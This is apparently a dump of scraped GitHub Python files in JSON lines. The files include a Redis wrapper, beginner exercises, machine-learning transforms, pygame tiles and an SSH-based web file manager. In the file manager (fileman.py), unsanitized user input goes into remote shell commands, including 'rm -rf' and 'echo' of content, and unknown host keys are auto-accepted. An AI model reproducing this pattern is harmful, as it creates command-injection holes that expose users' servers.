result\n\n return wrapper\n\n def _add_keys(self, *name, ex: 'float' = None):\n expires = self.forever\n # always keep it a bit longer than redis to avoid drift\n if ex:\n expires = time.time() + ex\n self._client.zadd(self.KEYS, {i: 
expires for i in name})\n\n    def set(self, name, value, ex=None, px=None, nx=False, xx=False):\n result = self._client.set(name, value, ex, px, nx, xx)\n if result:\n self._add_keys(name, ex=px / 1000 if px else ex or None)\n return result\n\n def delete(self, *names):\n result = self._client.delete(*names)\n if result > 0:\n self._client.zrem(self.KEYS, *names)\n return result\n\n def expire(self, name, ttl):\n result = self._client.expire(name, ttl)\n if result:\n self._client.zadd(self.KEYS, {name: time.time() + ttl})\n return result\n\n def persist(self, name):\n result = self._client.persist(name)\n if result:\n self._client.zadd(self.KEYS, {name: self.forever})\n return result\n\n def house_keeping(self):\n \"\"\"clean cached keys\"\"\"\n client = self._client\n deletes = []\n updates = {}\n for k, ts in client.zscan_iter(self.KEYS, \"*\"):\n ttl = client.ttl(k)\n if ttl == -2: # key does not exist\n deletes.append(k)\n elif ttl == -1:\n if ts != self.forever:\n updates[k] = self.forever\n elif ttl == 0:\n deletes.append(k)\n else:\n updates[k] = time.time() + ttl\n\n if updates:\n client.zadd(self.KEYS, updates)\n\n if deletes:\n client.zrem(self.KEYS, *deletes)\n\n def flushdb(self, asynchronous=False):\n self.delete(*self.keys(), self.KEYS)\n\n def flushall(self, asynchronous=False):\n self.delete(*self.keys(), self.KEYS)\n\n def pipeline(self, transaction=True, shard_hint=None):\n return self\n\n def execute(self, raise_on_error=True):\n return []\n\n def scan_iter(self, match=None, count=None):\n now = time.time()\n client = self._client\n for k, ts in client.zscan_iter(self.KEYS, match):\n if ts <= now:\n # theoretically expired\n ttl = client.ttl(k)\n if ttl == -2 or ttl == 0: # already deleted\n client.zrem(self.KEYS, k)\n continue\n else: # updated but not yet synced\n client.zadd(self.KEYS, {k: self.forever if ttl == -1 else time.time() + ttl})\n\n if count is not None:\n count -= 1\n yield k\n\n if count == 0:\n break\n\n def keys(self, pattern='*'):\n return list(self.scan_iter(pattern, None))\n\n\nclass Client(DefaultClient):\n def get_client(self, write=True, tried=(), show_index=False):\n parts = super().get_client(write, tried, show_index)\n if show_index:\n return TwemRedis(parts[0]), parts[1]\n return TwemRedis(parts)\n\n def _update(self, key, delta=0, version=None, client: 'StrictRedis' = None):\n client = client or self.get_client()\n key = self.make_key(key, version=version)\n if not client.exists(key):\n raise ValueError(f\"Key '{key}' not found\")\n return client.incr(key, delta)\n\n def incr(self, key, delta=1, version=None, client=None, ignore_key_check=False):\n return self._update(key, delta, version, client)\n\n def decr(self, key, delta=1, version=None, client=None):\n return self._update(key, -delta, version, client)\n","repo_name":"TencentBlueKing/blueking-paas","sub_path":"svc-rabbitmq/svc_rabbitmq/redis.py","file_name":"redis.py","file_ext":"py","file_size_in_byte":5661,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"32"} +{"seq_id":"12256060239","text":"\"\"\"This program arranges the remaining timbits into the minimum number of boxes and calculates the cost.\"\"\"\n# we have to find the total cost of the timbits we want\n# timbits cost table\n# Number Price\n\n# 1 $0.20\n# 10 (small box) $1.99\n# 20 (medium box) $3.39\n# 40 (large box) $6.19\ntimbits = int(input())\nTOTAL = 0\n\nbig_box = timbits // 40\nTOTAL += big_box*6.19\ntimbits -= 40*big_box\n\nmed_box = timbits // 20\nTOTAL += med_box*3.39\ntimbits -= 20 * med_box\n\nsmall_box = timbits // 10\nTOTAL += small_box * 1.99\ntimbits 
-= 10 * small_box\n\nTOTAL += timbits*0.20\n\nprint(TOTAL)\n","repo_name":"shubhamrastogi1810/Python_Practicals","sub_path":"cs_circles_answers/design_debug_timbits.py","file_name":"design_debug_timbits.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73997382171","text":"# Definition for a binary tree node.\nfrom queue import Queue\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass CBTInserter:\n\n def __init__(self, root: TreeNode):\n self.root = root\n \n def insert(self, v: int) -> int:\n q = Queue()\n q.put(self.root)\n while(not q.empty()):\n tmpNode = q.get()\n if tmpNode.left != None:\n q.put(tmpNode.left)\n else:\n tmpNode.left = TreeNode(v)\n return tmpNode.val\n if tmpNode.right != None:\n q.put(tmpNode.right)\n else:\n tmpNode.right = TreeNode(v)\n return tmpNode.val\n \n def get_root(self) -> TreeNode:\n return self.root","repo_name":"Leputa/Leetcode","sub_path":"python/919.Complete Binary Tree Inserter.py","file_name":"919.Complete Binary Tree Inserter.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14687935998","text":"import math\n\nimport numpy as np\nfrom PIL import Image\nfrom torchvision import datasets\nfrom torchvision import transforms\n\nfrom .randaugment import RandAugmentMC\n\n# logger = logging.getLogger(__name__)\n\n\nclass TransformFixMatch(object):\n def __init__(self, mean, std):\n self.weak = transforms.Compose([\n# transforms.ToTensor(),\n transforms.ToPILImage(),\n transforms.RandomHorizontalFlip(), transforms.ToTensor()\n# transforms.RandomCrop(size=224,\n# padding=int(224*0.125),\n# padding_mode='reflect')\n ])\n self.strong = transforms.Compose([\n# transforms.ToTensor(),\n transforms.ToPILImage(),\n transforms.RandomHorizontalFlip(),\n# transforms.RandomCrop(size=224,\n# padding=int(224*0.125),\n# padding_mode='reflect'),\n RandAugmentMC(n=2, m=10), transforms.ToTensor()\n ])\n# self.normalize = transforms.Compose([\n# transforms.ToTensor(), \n# transforms.Normalize(mean=mean, std=std)])\n \n self.clean_transforms = transforms.Compose([\n \n transforms.ToTensor(),\n transforms.ToPILImage(),\n# transforms.Resize((224, 224)),\n transforms.RandomCrop(size=224,\n padding=int(224*0.125),\n padding_mode='reflect'),\n# transforms.RandomResizedCrop(224,\n# scale=(1.00, 1.2),\n# ratio=(0.75, 1.3333333333333333)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n\n def __call__(self, x):\n x = self.clean_transforms(x)\n weak = self.weak(x)\n strong = self.strong(x)\n return weak, strong, x","repo_name":"ranarag/FewShotVQG","sub_path":"FSVQG/utils/fixmatch.py","file_name":"fixmatch.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38370150018","text":"import os\r\n\r\nimport pygame\r\n\r\nfrom game_objects.sprite import GenericSprite\r\n\r\nGAME_OVER = 3\r\nBASE_HIT_TIMER = 12\r\n\r\n\r\nclass GenericTile(GenericSprite):\r\n \"\"\"Generic class to represent one tile of the playing field.\"\"\"\r\n\r\n def __init__(self, x, y, img_x, img_y, image_name: str = None):\r\n super().__init__()\r\n\r\n self.x = x\r\n self.y = y\r\n\r\n if image_name is not None:\r\n curdir = os.path.dirname(__file__)\r\n image_path = os.path.join(\r\n curdir, 
\"..\", \"assets\", \"tiles\", image_name)\r\n self.image = pygame.image.load(image_path)\r\n\r\n self.rect = self.image.get_rect()\r\n self.rect.x = img_x\r\n self.rect.y = img_y\r\n\r\n def scale(self, side_length: int) -> None:\r\n \"\"\"Scales the tile.\r\n\r\n Args:\r\n side_length (int): Wanted side length of tile in pixels.\r\n \"\"\"\r\n self.image = pygame.transform.scale(\r\n self.image, (side_length, side_length))\r\n self.rect = self.image.get_rect()\r\n self.rect.x = self.x*side_length\r\n self.rect.y = self.y*side_length\r\n\r\n def get_pos(self) -> tuple:\r\n \"\"\"Returns the field position of the tile.\r\n\r\n Returns:\r\n pos (tuple): (x, y)\r\n \"\"\"\r\n return (self.x, self.y)\r\n\r\n def get_img_pos(self) -> tuple:\r\n \"\"\"Returns the image position of the tile.\r\n\r\n Returns:\r\n pos (tuple): (x, y)\r\n \"\"\"\r\n return (self.rect.x, self.rect.y)\r\n\r\n\r\nclass PathTile(GenericTile):\r\n \"\"\"A tile on which enemies move.\"\"\"\r\n\r\n def __init__(self, x, y, img_x, img_y):\r\n image_name = \"path.png\"\r\n super().__init__(x, y, img_x, img_y, image_name=image_name)\r\n\r\n\r\nclass BuildableTile(GenericTile):\r\n \"\"\"A tile on which towers can be built.\"\"\"\r\n\r\n def __init__(self, x, y, img_x, img_y):\r\n image_name = \"buildable.png\"\r\n super().__init__(x, y, img_x, img_y, image_name=image_name)\r\n\r\n\r\nclass BaseTile(GenericTile):\r\n \"\"\"A tile which is the base of the player.\"\"\"\r\n\r\n def __init__(self, x, y, img_x, img_y):\r\n super().__init__(x, y, img_x, img_y)\r\n\r\n self.status = {}\r\n self.status[\"health\"] = 100\r\n self.status[\"hit_timer\"] = 0\r\n\r\n images = {\r\n \"normal\": [\"tiles\", \"base.png\"],\r\n \"hit\": [\"tiles\", \"base_hit.png\"]\r\n }\r\n\r\n self.load_images(images)\r\n self.__update_image()\r\n\r\n self.rect = self.image.get_rect()\r\n self.rect.x = img_x\r\n self.rect.y = img_y\r\n\r\n def update(self, damage: int = None) -> None:\r\n \"\"\"Override of the pygame update function.\r\n Use without arguments once per frame to update cooldowns.\r\n\r\n Args:\r\n damage (int): The base takes this amount of damage. 
(Default value = None)\r\n \"\"\"\r\n if damage is not None:\r\n self.__take_damage(damage)\r\n else:\r\n self.__update_timers()\r\n\r\n self.__update_image()\r\n\r\n def draw(self, surface: pygame.Surface):\r\n \"\"\"Implementation of the pygame draw function.\r\n\r\n Args:\r\n surface (pygame.Surface): The surface on which to draw.\r\n \"\"\"\r\n surface.blit(self.image, self.rect)\r\n\r\n def __take_damage(self, damage: int) -> None:\r\n self.status[\"health\"] -= damage\r\n self.status[\"hit_timer\"] = BASE_HIT_TIMER\r\n\r\n if self.status[\"health\"] <= 0:\r\n pygame.event.post(pygame.event.Event(\r\n pygame.USEREVENT, custom_type=GAME_OVER))\r\n\r\n def __update_timers(self) -> None:\r\n if self.status[\"hit_timer\"] > 0:\r\n self.status[\"hit_timer\"] -= 1\r\n\r\n def __update_image(self) -> None:\r\n if self.status[\"hit_timer\"] > 0:\r\n self.image = self.images[\"hit\"]\r\n else:\r\n self.image = self.images[\"normal\"]\r\n","repo_name":"TemeKoo/ot-harjoitustyo","sub_path":"src/game_objects/tiles.py","file_name":"tiles.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18847404994","text":"import paramiko\nfrom flask import session\nimport os\n\nclients = {}\nclient_directory = {}\n\ndef init_client(username, password):\n proxy = None\n client = paramiko.SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n server = \"149.89.161.100\"\n\n client.connect(server, username=username, password=password, sock=proxy)\n\n\n clients[username] = client\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(\"pwd\")\n #print(ssh_stdout.readlines()[0][:-1])\n\n client_directory[username] = ssh_stdout.readlines()[0][:-1]\n\n\n\ndef list_files(username):\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command( f\"cd {client_directory[username]}; ls -p | grep -v /\")\n\n return ssh_stdout.readlines()\n\ndef list_folders(username):\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; ls -d */\")\n\n return ssh_stdout.readlines()\n\ndef cat_file(file, username):\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; cat {file}\")\n\n return ssh_stdout.readlines()\n\ndef cd(directory, username):\n print(directory)\n\n #when the path is an absolute path (starts with /), then cd to that path\n #otherwise, cd to the current directory and then cd to the path\n new_directory = \"\"\n if directory[0] == \"/\":\n new_directory = directory\n else:\n new_directory = client_directory[username] + \"/\" + directory\n\n print(new_directory)\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {new_directory}; pwd\")\n client_directory[username] = ssh_stdout.readlines()[0][:-1]\n print(client_directory[username])\n\ndef currentPath(username):\n return client_directory[username]\n\ndef rename_file(directory, old, new, username):\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(\"mv \" + directory + \"/\" + old + \" \" + directory + \"/\" + new)\n\n return ssh_stdout.readlines()\n\ndef delete_file(filename, username):\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; rm {filename}\")\n\n return ssh_stdout.readlines()\n\ndef rename_file(old, new, username):\n\n ssh_stdin, ssh_stdout, ssh_stderr = 
clients[username].exec_command(f\"cd {client_directory[username]}; mv {old} {new}\")\n\n return ssh_stdout.readlines()\n\ndef create_file(filename, username, content):\n # we use hex to avoid issues with special characters\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; echo '{content}' > temp && xxd -r -p temp > {filename}; rm temp\")\n\n return ssh_stdout.readlines()\n\ndef create_directory(foldername, username):\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; mkdir {foldername}\")\n\n return ssh_stdout.readlines()\n\ndef delete_directory(directoryname, username):\n\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; rm -rf {directoryname}\")\n\n return ssh_stdout.readlines()\n\ndef search(filename, username):\n #folders\n ssh_stdin, ssh_stdout_folders, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; find . -iname '*{filename}*' -type d 2>/dev/null\")\n #files\n ssh_stdin, ssh_stdout_files, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; find . -iname '*{filename}*' -type f 2>/dev/null\")\n return [ssh_stdout_folders.readlines(), ssh_stdout_files.readlines()]\n\ndef upload(filename, username, content):\n # print(filename)\n # ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; echo '{content}' > temp && xxd -r -p temp > '{filename}'; rm temp\")\n ftp_client= clients[username].open_sftp()\n localtemp = open(f\"./temp/{filename}\", \"wb\")\n localtemp.write(content)\n localtemp.close()\n\n ftp_client.put(f\"./temp/{filename}\", client_directory[username]+r\"/\"+filename)\n os.remove(f\"./temp/{filename}\")\n ftp_client.close()\n #return ssh_stdout.readlines()\n\ndef download(filename, username):\n ftp_client= clients[username].open_sftp()\n content = \"\"\n try:\n with ftp_client.open(client_directory[username]+r\"/\"+filename) as f:\n content = f.read()\n f.close()\n ftp_client.close()\n except PermissionError:\n ftp_client.close()\n return b\"Permission Denied\"\n return content\n\n\n\ndef get_hex(filename, username):\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; xxd -p {filename}\")\n\n return ssh_stdout.readlines()\n\ndef move_file_to_folder(filename, foldername, username):\n ssh_stdin, ssh_stdout, ssh_stderr = clients[username].exec_command(f\"cd {client_directory[username]}; mv {filename} {foldername}\")\n\n return ssh_stdout.readlines()\n\n","repo_name":"kev1n/jiangjiangwangwang","sub_path":"app/fileman.py","file_name":"fileman.py","file_ext":"py","file_size_in_byte":4987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"10135097555","text":"\"\"\"\n.. 
module:: Exp_BOSS\n\nExp_BOSS\n*************\n\n:Description: Exp_BOSS\n\n \n\n:Authors: bejar\n \n\n:Version: \n\n:Created on: 22/02/2017 11:20 \n\n\"\"\"\n\n__author__ = 'bejar'\n\nfrom iWalker.Data import User, Exercise, Exercises, Pacientes, Trajectory\nfrom iWalker.Util.Misc import show_list_signals\nfrom iWalker.Util import Boss, boss_distance, euclidean_distance, bin_hamming_distance, hamming_distance,\\\n cosine_similarity\nfrom sklearn.manifold import MDS, Isomap, TSNE, SpectralEmbedding\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\nif __name__ == '__main__':\n p = Pacientes()\n e = Exercises()\n p2 = Pacientes()\n e2 = Exercises()\n\n p.from_db(pilot='NOGALES')\n e.from_db(pilot='NOGALES')\n # p2.from_db(pilot='FSL')\n # e2.from_db(pilot='FSL')\n # e2.delete_patients(['FSL30'])\n #\n # e.merge(e2)\n\n e.delete_exercises([1425290750])\n # e.delete_exercises([1416241920, 1416241871, 1416409354, 1416391685, 1416933676, 1416918342, 1416391884, 1416391948])\n wlen = 128\n voclen = 3\n ncoefs = 5\n\n nseries = 0\n lcl = []\n\n print(len(e.edict))\n for ex in e.iterator():\n t = Trajectory(ex.get_coordinates())\n if t.straightness()[0] < 0.9:\n e.delete_exercises([ex.id])\n print(len(e.edict))\n\n\n\n for ex in e.iterator():\n forces = ex.get_forces()\n if forces.shape[0] > wlen:\n nseries += 1\n if 'FSL' in ex.uid:\n lcl.append('r')\n else:\n lcl.append('g')\n else:\n e.delete_exercises([ex.id])\n print(len(e.edict))\n\n mdist = np.zeros((nseries, nseries))\n print(nseries)\n\n for f in range(6):\n dseries = {}\n for ex in e.iterator():\n forces = ex.get_forces()\n if forces.shape[0] > wlen:\n dseries[str(ex.uid) + '#' + str(ex.id)] = forces[:, f]\n\n boss = Boss(dseries, 10, butfirst=True)\n boss.discretization_intervals(ncoefs, wlen, voclen)\n boss.discretize()\n lcodes = list(boss.codes.keys())\n\n for i in range(len(lcodes)):\n for j in range(i+1, len(lcodes)):\n # mdist[i,j] += bin_hamming_distance(boss.codes[lcodes[i]], boss.codes[lcodes[j]])\n # mdist[i,j] += euclidean_distance(boss.codes[lcodes[i]], boss.codes[lcodes[j]])\n mdist[i,j] += cosine_similarity(boss.codes[lcodes[i]], boss.codes[lcodes[j]])\n mdist[j, i] = mdist[i,j]\n # mdist[i,j] += (boss_distance(boss.codes[v1], boss.codes[v2]) + boss_distance(boss.codes[v2], boss.codes[v1]))/2\n\n # lej = []\n # for i, ex in enumerate(boss.codes.keys()):\n # lej.append((np.mean(mdist[i,:]), ex))\n #\n # for d, e in sorted(lej):\n # print(e,d)\n\n mdist /= np.max(mdist)\n\n # transf = MDS(n_components=100, dissimilarity='precomputed', n_jobs=-1, random_state=0)\n # fdata = transf.fit_transform(mdist)\n # print(transf.stress_)\n\n for nn in range(1, 2, 2):\n print(nn)\n fdata = mdist\n # imap = Isomap(n_components=3, n_neighbors=nn, n_jobs=-1)\n imap = SpectralEmbedding(n_components=2, affinity='precomputed', n_neighbors=nn)\n fdata = imap.fit_transform(fdata)\n\n fig = plt.figure(figsize=(10,10))\n # ax = fig.add_subplot(111, projection='3d')\n ax = fig.add_subplot(111)\n\n # plt.scatter(fdata[:, 0], fdata[:, 1], zs=fdata[:, 2], depthshade=False, s=100)\n plt.scatter(fdata[:, 0], fdata[:, 1], c=lcl)\n\n plt.show()\n","repo_name":"ogmaribel/masterthesis","sub_path":"Experiments/Exp_BOSS.py","file_name":"Exp_BOSS.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35022337419","text":"import csv\n\ndef main():\n with open('draft_1980_1993.csv', 'w') as f:\n writer = 
csv.writer(f)\n writer.writerow([\"Year\",\"Rnd\",\"Pick\",\"Tm\",\"Player\",\"Pos\",\"Age\",\"To\",\"St\",\"CarAV\",\"DrAV\",\"G\"])\n for year in range(1980, 1994):\n with open('draft_' + str(year) + '.csv', 'r') as g:\n reader = csv.reader(g)\n for line in reader:\n if (len(line[3].split(\"\\\\\")) > 1):\n line[3] = line[3].split(\"\\\\\")[0]\n line = [x.replace(' HOF', '') for x in line]\n writer.writerow([year] + line)\n\nif __name__ == '__main__':\n main()\n","repo_name":"kevinli96/NFL-Player-Valuation","sub_path":"data/draft_data_by_year/draft_loader.py","file_name":"draft_loader.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"43010281575","text":"n, m = map(int, input().split())\n\ns = []\n\ndef f():\n if len(s) == m:\n print(' '.join(map(str, s)))\n return\n\n for i in range(1, n + 1):\n if i in s: # skip numbers already in the sequence\n continue\n s.append(i)\n f()\n s.pop()\n\nf()","repo_name":"ChoiBeomJun99/BaekJoonStudy","sub_path":"15649.py","file_name":"15649.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39662200052","text":"# Connect 4 is a game where opponents take turns dropping red or black discs\r\n# into a 7 x 6 vertically suspended grid. The game ends either when one player\r\n# creates a line of four consecutive discs of their color (horizontally,\r\n# vertically, or diagonally), or when there are no more spots left in the grid.\r\n\r\n\r\nfrom enum import Enum\r\nfrom random import randint\r\n\r\n\r\nclass Disc(Enum):\r\n RED = 0\r\n BLACK = 1\r\n\r\n\r\nclass Connect4:\r\n def __init__(self):\r\n self.nrow = 7\r\n self.ncol = 6\r\n self.grid = [[None for i in range(self.ncol)]\r\n for j in range(self.nrow)]\r\n self.winner = None\r\n self.discs = (\"⦾\", \"◼\")\r\n\r\n def reset(self):\r\n self.grid = [[None for i in range(self.ncol)]\r\n for j in range(self.nrow)]\r\n self.winner = None\r\n\r\n def continue4(self, x, y):\r\n length = min(len(x), len(y))\r\n if length < 4:\r\n return False\r\n\r\n count = 0\r\n pre = self.grid[x[0]][y[0]]\r\n for i in range(1, min(len(x), len(y))):\r\n cur = self.grid[x[i]][y[i]]\r\n if cur and cur == pre:\r\n count = 2 if count == 0 else count + 1\r\n else:\r\n count = 0\r\n if count >= 4:\r\n self.winner = cur\r\n return True\r\n pre = cur\r\n return False\r\n\r\n def is_full(self):\r\n for i in range(self.nrow):\r\n for j in range(self.ncol):\r\n if self.grid[i][j] is None:\r\n return False\r\n return True\r\n\r\n def is_over(self):\r\n if self.is_full():\r\n return True\r\n\r\n horizontally = any([self.continue4(\r\n [x for i in range(self.ncol)], [j for j in range(self.ncol)])\r\n for x in range(self.nrow)])\r\n if horizontally:\r\n return True\r\n\r\n vertically = any([self.continue4(\r\n [i for i in range(self.nrow)], [y for j in range(self.nrow)])\r\n for y in range(self.ncol)])\r\n if vertically:\r\n return True\r\n\r\n diagonally = any([self.continue4(\r\n [i for i in range(self.nrow)], [j for j in range(start, self.ncol)]\r\n ) for start in range(self.ncol)] + [self.continue4(\r\n [i for i in range(start, self.nrow)], [j for j in range(self.ncol)]\r\n ) for start in range(self.nrow)] + [self.continue4(\r\n [i for i in range(self.nrow)], [j for j in range(start, -1, -1)]\r\n ) for start in range(self.ncol - 1, -1, -1)] + [self.continue4(\r\n [i for i in range(start, self.nrow)], [\r\n j for j in range(self.ncol - 1, -1, 
-1)]\r\n ) for start in range(self.nrow)]\r\n )\r\n if diagonally:\r\n return True\r\n\r\n return False\r\n\r\n def display(self):\r\n print(\"-\" * 13)\r\n for row in self.grid:\r\n print(\r\n \" \".join([\"{}\" for _ in range(6)]).format(\r\n *[\r\n self.discs[row[i].value] if row[i] is not None else \"◻\"\r\n for i in range(6)\r\n ]\r\n ),\r\n end=\" |\\n\",\r\n )\r\n print(\"-\" * 13)\r\n\r\n def put(self, i, j, disc=0):\r\n if 0 <= i < 7 and 0 <= j < 6:\r\n if self.grid[i][j] is None:\r\n if disc == 0 or disc == 1:\r\n self.grid[i][j] = Disc.RED if disc == 0 else Disc.BLACK\r\n return True\r\n return False\r\n\r\n\r\nif __name__ == \"__main__\":\r\n c4 = Connect4()\r\n step = 0\r\n while not c4.is_over():\r\n while not c4.put(randint(0, 6), randint(0, 5), step & 1):\r\n continue\r\n\r\n c4.display()\r\n step += 1\r\n\r\n if c4.winner:\r\n print('Winner is {}'.format(c4.winner))\r\n else:\r\n print('Draw.')\r\n","repo_name":"kemingy/daily-coding-problem","sub_path":"src/connect4.py","file_name":"connect4.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"14118694341","text":"import sys\nimport os\nimport time\nimport copy\nimport yaml\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\nfrom physical_env.network.NetworkIO import NetworkIO\nfrom physical_env.mc.MobileCharger import MobileCharger\n\ndef log(net, mcs):\n # If you want to print something, just put it here. Do not revise the core code.\n while True:\n print(net.env.now, net.listNodes[0].energy)\n yield net.env.timeout(1.0)\n\nnetIO = NetworkIO(\"physical_env/network/network_scenarios/hanoi1000n50.yaml\")\nenv, net = netIO.makeNetwork()\n\nwith open(\"physical_env/mc/mc_types/default.yaml\", 'r') as file:\n mc_argc = yaml.safe_load(file)\nmcs = [MobileCharger(copy.deepcopy(net.baseStation.location), mc_phy_spe=mc_argc) for _ in range(3)]\n\nfor id, mc in enumerate(mcs):\n mc.env = env\n mc.net = net\n mc.id = id\n mc.log = [net.baseStation.location[0], net.baseStation.location[1], 0]\nmc0_process = env.process(mcs[0].operate_step([0.7 * (net.frame[1] - net.frame[0]) + net.frame[0], 0.8 * (net.frame[3] - net.frame[2]) + net.frame[2], 75]))\nmc1_process = env.process(mcs[1].operate_step([0.7 * (net.frame[1] - net.frame[0]) + net.frame[0], 0.8 * (net.frame[3] - net.frame[2]) + net.frame[2], 50])) \nmc2_process = env.process(mcs[2].operate_step([0.35 * (net.frame[1] - net.frame[0]) + net.frame[0], 0.6 * (net.frame[3] - net.frame[2]) + net.frame[2], 100])) \nnet_process = env.process(net.operate())\n\ngeneral_process = mc0_process | mc1_process | mc2_process | net_process\n\nenv.process(log(net, mcs))\nenv.run(until = net_process)\n#env.run(until = general_process)","repo_name":"nguyenngocbaocmt02/multi_agent_rl_wrsn","sub_path":"runner/test_mc.py","file_name":"test_mc.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"18842568455","text":"import subprocess\nfrom itertools import chain\n\n\nhandlers = {}\n\nclass FormatHandler:\n\tdef __init_subclass__(cls):\n\t\tfor ext in cls.extensions:\n\t\t\thandlers[ext] = cls()\n\nclass Vorbis(FormatHandler):\n\textensions = ('flac','opus')\n\n\ttagnames = {\n\t\t# 
https://xiph.org/vorbis/doc/v-comment.html\n\t\t\"title\":\"TITLE\",\n\t\t\"artist\":\"ARTIST\",\n\t\t\"albumartist\":\"ALBUMARTIST\",\n\t\t\"album\":\"ALBUM\",\n\t\t\"genre\":\"GENRE\",\n\t\t\"date\":\"DATE\",\n\t\t\"tracknumber\":\"TRACKNUMBER\"\n\t}\n\n\tdef tag(self,file,tags,data):\n\n\t\tsubprocess.call([\"metaflac\"] + [f\"--remove-tag={key}\" for key in tags] + [file])\n\t\tsubprocess.call([\"metaflac\",file] + [f\"--set-tag={self.tagnames[key]}={value}\" for key,value in tags.items()])\n\t\tif data['remove_artwork']:\n\t\t\tsubprocess.call([\"metaflac\",\"--remove\",\"--block-type=PICTURE\",file])\n\n\nclass ID3(FormatHandler):\n\textensions = ('mp3',)\n\n\ttagnames = {\n\t\t# https://id3.org/id3v2.3.0#Text_information_frames\n\t\t\"title\":\"TIT2\",\n\t\t\"artist\":\"TPE1\",\n\t\t\"albumartist\":\"TPE2\", # not to specs, but commonly used,\n\t\t\"album\":\"TALB\",\n\t\t\"genre\":\"TCON\", # :/\n\t\t\"date\":\"TYER\",\n\t\t\"tracknumber\":\"TRCK\"\n\t}\n\n\tdef tag(self,file,tags,data):\n\t\tsubprocess.call([\"id3v2\"] + list(chain(*[[f\"--{self.tagnames[key]}\",str(value)] for key,value in tags.items()])) + [file])\n","repo_name":"krateng/mumema","sub_path":"mumema/formats.py","file_name":"formats.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70883262492","text":"import sys\nfrom optparse import make_option\nfrom snf_django.lib.api import Credentials\nfrom django.core.management.base import CommandError\nfrom snf_django.management.commands import SynnefoCommand\nfrom synnefo.management.common import get_resource\nfrom synnefo.api.util import (COMPUTE_API_TAG_NAMESPACES as tag_namespaces,\n make_tag)\nfrom synnefo.logic import servers\n\n\nclass Command(SynnefoCommand):\n args = \" \"\n help = \"Check whether a server tag exists\"\n\n def handle(self, *args, **options):\n if len(args) != 2:\n raise CommandError(\"Please provide a server ID and a tag\")\n\n credentials = Credentials(\"snf-manage\", is_admin=True)\n server_id = args[0]\n server = get_resource(\"server\", server_id)\n\n tag = args[1]\n header = ['tag', 'status', 'namespace']\n table = []\n\n for namespace in tag_namespaces:\n tag_db = make_tag(tag, namespace)\n db_tag = servers.check_tag_exists(server_id, credentials, tag_db)\n if db_tag:\n table.append([tag.encode('utf-8'), db_tag.status, namespace])\n\n if table:\n self.pprint_table(table, header, options[\"output_format\"])\n","repo_name":"grnet/synnefo","sub_path":"snf-cyclades-app/synnefo/logic/management/commands/server-tag-exists.py","file_name":"server-tag-exists.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"32"} +{"seq_id":"31449444358","text":"#! 
